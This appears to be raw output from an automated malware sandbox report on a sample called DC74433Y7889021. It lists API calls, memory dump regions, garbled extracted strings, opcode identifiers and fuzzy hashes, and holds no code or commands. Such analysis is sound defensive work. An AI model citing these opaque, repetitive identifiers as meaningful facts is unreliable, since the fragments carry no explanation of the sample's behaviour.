                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0

                                                      Control-flow Graph
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B5A961,00000800,00000000,00000000), ref: 02B5AB72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0

                                                      Control-flow Graph
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B5A961,00000800,00000000,00000000), ref: 02B5AB72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0

                                                      Control-flow Graph
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02B5A961,00000800,00000000,00000000), ref: 02B5AB72
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0

                                                      Control-flow Graph
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 02B5A8E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0

                                                      Control-flow Graph
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0723B165
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1688744472.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7230000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0

                                                      Control-flow Graph
                                                      APIs
                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0723B165
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1688744472.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7230000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID: MessagePost
                                                      • String ID:
                                                      • API String ID: 410705778-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682002867.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2afd000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682043213.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b0d000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682043213.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b0d000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682043213.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b0d000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682002867.0000000002AFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AFD000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2afd000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1682043213.0000000002B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b0d000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1686449847.0000000002B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2b50000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:

                                                      Execution Graph

                                                      Execution Coverage: 13.1%
                                                      Dynamic/Decrypted Code Coverage: 100%
                                                      Signature Coverage: 6.4%
                                                      Total number of Nodes: 110
                                                      Total number of Limit Nodes: 12

                                                      Control-flow Graph
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (odq$(odq$(odq$,hq$,hq
                                                      • API String ID: 0-2216594193

                                                      Control-flow Graph
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
                                                      • API String ID: 0-2148883620
                                                      • Opcode ID: d1a9f5c87ca59cce2059f4ea69d259097d5373c8751d86e30034fd5c31f65bc3
                                                      • Instruction ID: 9da4efba055602e497d79796fca4f41e8cce7846159b424902e92eac855902cf
                                                      • Opcode Fuzzy Hash: d1a9f5c87ca59cce2059f4ea69d259097d5373c8751d86e30034fd5c31f65bc3
                                                      • Instruction Fuzzy Hash: 27B10474E002189FDB25CFA9D884A9DBBF2BF89300F14D46AE509AB761DB349842CF50

                                                      Control-flow Graph (rendered graph not captured; legend: Executed, Not Executed)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
                                                      • API String ID: 0-2148883620
                                                      • Opcode ID: 75cd1af2c950959f2e7983a093c78e3e5c995aab2928dea29b315c98cd6fbee2
                                                      • Instruction ID: 3b9d7eaf3a522f8ddc5f271a0f2e79baf6d0aeb4d7ce6c96316665b49b9ffda2
                                                      • Opcode Fuzzy Hash: 75cd1af2c950959f2e7983a093c78e3e5c995aab2928dea29b315c98cd6fbee2
                                                      • Instruction Fuzzy Hash: 2091B174E00218CFDB15DFA9D984ADEBBF2BF88301F14806AD509AB365DB749945CF50

                                                      Control-flow Graph (rendered graph not captured; legend: Executed, Not Executed)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
                                                      • API String ID: 0-2148883620
                                                      • Opcode ID: d6a72ef0906774d327873f6481041979ed1cb21ee49bd870489c643c450ba64f
                                                      • Instruction ID: a4119885582a71799d126b78258c1ca4dc0d8a9ec3e86c0679b2b7e968cd1d5e
                                                      • Opcode Fuzzy Hash: d6a72ef0906774d327873f6481041979ed1cb21ee49bd870489c643c450ba64f
                                                      • Instruction Fuzzy Hash: AD81B2B4E00218CFDB15DFAAD944B9DBBF2BF88300F24946AE519AB355DB709981CF50

                                                      Control-flow Graph (rendered graph not captured; legend: Executed, Not Executed)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
                                                      • API String ID: 0-2148883620
                                                      • Opcode ID: 1f3397da79f5031f8af183f3eedb0b038071075cffd2f7eed9ad823066061ead
                                                      • Instruction ID: 0da8703f6ffea66926d9e197639d2b7b5b05d48c760b500454d5c083223effca
                                                      • Opcode Fuzzy Hash: 1f3397da79f5031f8af183f3eedb0b038071075cffd2f7eed9ad823066061ead
                                                      • Instruction Fuzzy Hash: CE81B3B4E01218CFDB14DFA9D984A9DBBF2BF88300F24C069E519AB765DB349985CF50

                                                      Control-flow Graph (rendered graph not captured; legend: Executed, Not Executed)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
                                                      • API String ID: 0-2148883620
                                                      • Opcode ID: 9e73ec845296a4c06c73bbd3a6c5b78eff016de730899dffcf71527fa06eee5b
                                                      • Instruction ID: 7418c5e965839110269df26a53b800b5da7335bbc9829f190e166ae4f30929cc
                                                      • Opcode Fuzzy Hash: 9e73ec845296a4c06c73bbd3a6c5b78eff016de730899dffcf71527fa06eee5b
                                                      • Instruction Fuzzy Hash: E981C474E00218CFDB14DFAAD884A9DBBF2BF88300F24D46AD519AB365DB709981CF50

                                                      Control-flow Graph (rendered graph not captured; legend: Executed, Not Executed)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
                                                      • API String ID: 0-2148883620
                                                      • Opcode ID: c9edd087d05e6a6b90547dcd0bcba04e0b4e175e134dcfa41a5e932bf681c4fb
                                                      • Instruction ID: cae1a0a3eddf3389628426f64669574ffc508340b77fc814f6ea63a781d23702
                                                      • Opcode Fuzzy Hash: c9edd087d05e6a6b90547dcd0bcba04e0b4e175e134dcfa41a5e932bf681c4fb
                                                      • Instruction Fuzzy Hash: 6B81D274E00218CFDB14DFA9D884A9DBBF2BF88301F20D46AE519AB765DB309981CF50

                                                      Control-flow Graph (rendered graph not captured; legend: Executed, Not Executed)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
                                                      • API String ID: 0-2148883620
                                                      • Opcode ID: 4a043f6bc27ce3fd6e749970ff1c89baccde62f56b1c76b493a937d98ca02d46
                                                      • Instruction ID: f33268936ac7fbfa9dcc7a00ee78440746f4731e06b4f054474dd0dc3c6a6bcd
                                                      • Opcode Fuzzy Hash: 4a043f6bc27ce3fd6e749970ff1c89baccde62f56b1c76b493a937d98ca02d46
                                                      • Instruction Fuzzy Hash: 4281C374E01218CFDB54DFAAD984A9DBBF2BF88300F14C069E519AB765DB349982CF10

                                                      Control-flow Graph (rendered graph not captured; legend: Executed, Not Executed)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0okp$Ljkp$Ljkp$PHdq$PHdq
                                                      • API String ID: 0-2148883620
                                                      • Opcode ID: bb92e283e8dcdcb66fd71a54eccb74eea12fe9f6628a3896b2a672c685130003
                                                      • Instruction ID: 215ca830ffda38cd4fc3219abf0481c1cde168ef3ee2e769d40952074fdf1eaf
                                                      • Opcode Fuzzy Hash: bb92e283e8dcdcb66fd71a54eccb74eea12fe9f6628a3896b2a672c685130003
                                                      • Instruction Fuzzy Hash: 9A81B274E00218CFEB14DFA9D984A9DBBF2BF88300F14D46AD519AB765DB349981CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (odq$4'dq$4'dq$4'dq
                                                      • API String ID: 0-3599379907
                                                      • Opcode ID: 6ff0a5396b76b2c952ce2370517a86cd062ef4ae34a12dda569777c3a7eb55b0
                                                      • Instruction ID: de74fa547db53a563689aa178b531627712c848d6bee3bd39dde6a9953d325ef
                                                      • Opcode Fuzzy Hash: 6ff0a5396b76b2c952ce2370517a86cd062ef4ae34a12dda569777c3a7eb55b0
                                                      • Instruction Fuzzy Hash: 62A28D70A006098FCB16CF68C584AEEBBF2FF88314F158569E605DB7A5D735E941CB60

                                                      Control-flow Graph (rendered graph not captured; legend: Executed, Not Executed)
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xhq$Xhq$Xhq$Xhq
                                                      • API String ID: 0-3565632849
                                                      • Opcode ID: 0fe101933af758e47de337831a037113bfc6d4752d9d449ef5336a4f3a402c96
                                                      • Instruction ID: 35ba4e69094a96b57c0addf6bdc6957deb49b63554a583a75945cc605670f39f
                                                      • Opcode Fuzzy Hash: 0fe101933af758e47de337831a037113bfc6d4752d9d449ef5336a4f3a402c96
                                                      • Instruction Fuzzy Hash: 290292319086D58FCB23CF38C4E079ABFF2AF4B214B5909D9C985DB906DB34A591CB12
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (odq$Hhq
                                                      • API String ID: 0-1720555311
                                                      • Opcode ID: bd18066d7f43bc88b1473ec0c06fa8dcf82c80659b8360d5472a79d1725a2719
                                                      • Instruction ID: 0f3e681bb5f0052a09e67c96b35865be4daffcdb705d5d8f7361354aee26b0b9
                                                      • Opcode Fuzzy Hash: bd18066d7f43bc88b1473ec0c06fa8dcf82c80659b8360d5472a79d1725a2719
                                                      • Instruction Fuzzy Hash: 61126D70A002198FDB19DF69C854BAEBBF6FF88304F248569E9059B791DB349D42CF90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xhq$$dq
                                                      • API String ID: 0-4001282582
                                                      • Opcode ID: 9efbc2e2810bbd0e14c144c13a4b0b981b139162d3b9883d106368fcd79afdb5
                                                      • Instruction ID: 45e12c3598f31af3fda27ab5974a277987f9ab2a3002d0e746101b4e6d82eeb8
                                                      • Opcode Fuzzy Hash: 9efbc2e2810bbd0e14c144c13a4b0b981b139162d3b9883d106368fcd79afdb5
                                                      • Instruction Fuzzy Hash: F591A374F04219DBDB099FB488642BFBBA7BFC8710B05C91DD606EB686CE34C8528795
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 169cf0c5999c0c94aee18a86a7dee14106f159b48d632e9d8d3440f57368b74a
                                                      • Instruction ID: 4fdf86a8bdc00737587a08e25e1eb9c6bae5255e0fa73e1db04dd8478bedf9b2
                                                      • Opcode Fuzzy Hash: 169cf0c5999c0c94aee18a86a7dee14106f159b48d632e9d8d3440f57368b74a
                                                      • Instruction Fuzzy Hash: 99F1E474E01228CFDB54DFA9D984B9DBBB2BF88304F14C1A9E808AB355DB709985CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4140129189.00000000090D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 090D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_90d0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hhq
                                                      • API String ID: 0-4210879014
                                                      • Opcode ID: bcc8feb448c15c35e6cbd085c3fc4b10e8500f58f0c03fc594455e47994076c1
                                                      • Instruction ID: 4bcfaf0a0958931da1f60bef2433e266d98d6f3d2799b3566deaf817adbb8d16
                                                      • Opcode Fuzzy Hash: bcc8feb448c15c35e6cbd085c3fc4b10e8500f58f0c03fc594455e47994076c1
                                                      • Instruction Fuzzy Hash: DBE17B717027008FDBA9EB79C85076E77E6AF89700F14886DD656CB290CF39E802CB91
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d7fb0a24ef5fc29e3be4045699c6124f95f0faf2b1a3f874ac0b1ab4bb7cbaee
                                                      • Instruction ID: c92ad7f08bce0957cd9ec31bd580420cf8fc31a0ded5e8e6bc9e1e575be8b898
                                                      • Opcode Fuzzy Hash: d7fb0a24ef5fc29e3be4045699c6124f95f0faf2b1a3f874ac0b1ab4bb7cbaee
                                                      • Instruction Fuzzy Hash: 5772BF74E012298FDBA4DF69C990BEDBBB2BB49300F1481E9D409AB355DB349E81CF40
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 222fbfbf7bbbb315ce5bad0dbbcb9c1c9506fe3657a37eb68342eb3889493c8c
                                                      • Instruction ID: 8887269337d5bfb94ea2f8aa9f5278a1894cb260ea0f8cd68d8da3068114aee0
                                                      • Opcode Fuzzy Hash: 222fbfbf7bbbb315ce5bad0dbbcb9c1c9506fe3657a37eb68342eb3889493c8c
                                                      • Instruction Fuzzy Hash: 28C19E74E01218CFDB58DFA5D944BADBBB2BF89301F2081AAD809AB354DB355E81CF50
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80855022206101bee5a6a0b0b5280a8570aa4c933a644df475eaf97b14a4a7fd
                                                      • Instruction ID: f5f483fc19a114844966ceefd37a21fa1ee1a97d004e1d8d69a553bdd8591427
                                                      • Opcode Fuzzy Hash: 80855022206101bee5a6a0b0b5280a8570aa4c933a644df475eaf97b14a4a7fd
                                                      • Instruction Fuzzy Hash: C0A10370D002188FDB14DFA9C954BEDBBB1FF88310F209269E509AB3A1DB759A85CF54
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0c4ac039164a4036625e374b70dd721656d5b59552a7081c2e4111991c386ba7
                                                      • Instruction ID: d9ac9327edb1663cc99a78c5903308ee5edc53ae542a329274ec7eeddd9805d2
                                                      • Opcode Fuzzy Hash: 0c4ac039164a4036625e374b70dd721656d5b59552a7081c2e4111991c386ba7
                                                      • Instruction Fuzzy Hash: 31A1F370D002188FDB54DFA9C954BEDBBB1FF88300F209269E509AB3A1DB759A85CF54
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4137359761.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_60e0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 81bbc27f8dabe9171da7fdfa080c82a338f5ba8848580bca88cc4d38adcd7eee
                                                      • Instruction ID: 007ce3d8a9b73f10ff2eca4e5dedc88b2d6bf27d72f247b236dd918fbcac68e0
                                                      • Opcode Fuzzy Hash: 81bbc27f8dabe9171da7fdfa080c82a338f5ba8848580bca88cc4d38adcd7eee
                                                      • Instruction Fuzzy Hash: EE91F370D40218CFEB54DFA8C854BEDBBB1FF49310F2092A9E509AB291DB759A84CF54
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 91006f0243ea93607cf5b1518507d3a208eaf22592e6f3392a1025e267ed721e
                                                      • Instruction ID: 0fe3561865892cce34b9bb460c289e8a65fa4a86e3bdf4b2ff10705b5584a557
                                                      • Opcode Fuzzy Hash: 91006f0243ea93607cf5b1518507d3a208eaf22592e6f3392a1025e267ed721e
                                                      • Instruction Fuzzy Hash: 2951B574E00218DFDB19DFAAD894ADDBBF2AF89300F24C029E919AB764DB345841CF00
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b25dae7a37efed11cfd837cc72f7b2bdb16eb46379530f9026c93c33a4ae8d2f
                                                      • Instruction ID: 9012506d09ada61cb25f89792bafaa82ad6e427de30ae89ccfc893afdb7478ae
                                                      • Opcode Fuzzy Hash: b25dae7a37efed11cfd837cc72f7b2bdb16eb46379530f9026c93c33a4ae8d2f
                                                      • Instruction Fuzzy Hash: E851A474E01318DFDB19DFAAD894A9DBBF2BF89301F248029E919AB364DB345841CF14

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (odq$(odq$(odq$(odq$(odq$(odq$,hq$,hq
                                                      • API String ID: 0-1376594924
                                                      • Opcode ID: 676f3fcaa36894c4f427e7292a432d75a479581759b8efa5397e1f0bcd552edc
                                                      • Instruction ID: bb6aa620a78b927240cb95d8bc4ec9c847a6d9b24ca9e5619e6d507c765db819
                                                      • Opcode Fuzzy Hash: 676f3fcaa36894c4f427e7292a432d75a479581759b8efa5397e1f0bcd552edc
                                                      • Instruction Fuzzy Hash: 5A125A31A002088FCB26CF68D884AEEBBF2FF89315F158559E949DB6A1D730ED41CB50

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hhq$Hhq
                                                      • API String ID: 0-2450388649
                                                      • Opcode ID: 098390bddcc30376582d71b1341322f141903b5f3d07559801079818b2f52604
                                                      • Instruction ID: 1e38fad098bc3437a9bf55a0dbf2cb553206cd40bef119429808721defb4a9d8
                                                      • Opcode Fuzzy Hash: 098390bddcc30376582d71b1341322f141903b5f3d07559801079818b2f52604
                                                      • Instruction Fuzzy Hash: 1CB1C370B042158FDB169F34C8557BE7BAAEF89314F148569E606CB792DB34CC42CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,hq$,hq
                                                      • API String ID: 0-3475114797
                                                      • Opcode ID: deb2d033ea3ee2d0c8cf4df132e7360dfeeedabfb2432958556ab0c7f3de2974
                                                      • Instruction ID: 17767beb7bfd2392338fab5e6346e0f465a35194cd923b54fccee0df2d6ca9c0
                                                      • Opcode Fuzzy Hash: deb2d033ea3ee2d0c8cf4df132e7360dfeeedabfb2432958556ab0c7f3de2974
                                                      • Instruction Fuzzy Hash: 8281AF74B005058FCB15CF78C485AEABBBABF89304B158169D606DBBA6DB31EC41CF50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.4130165535.00000000023B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023B0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_23b0000_DC74433Y7889021.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xhq$Xhq
                                                      • API String ID: 0-635196136
                                                      • Opcode ID: 77d80221c4bd0dfaa79b46b843cce4712674a4ae94d77d345178fe8c08557b2e
                                                      • Instruction ID: 40212b2b8d45c77422b744e5325845575a6842b88681ca76bebb6feaf3cf20b2
                                                      • Opcode Fuzzy Hash: 77d80221c4bd0dfaa79b46b843cce4712674a4ae94d77d345178fe8c08557b2e
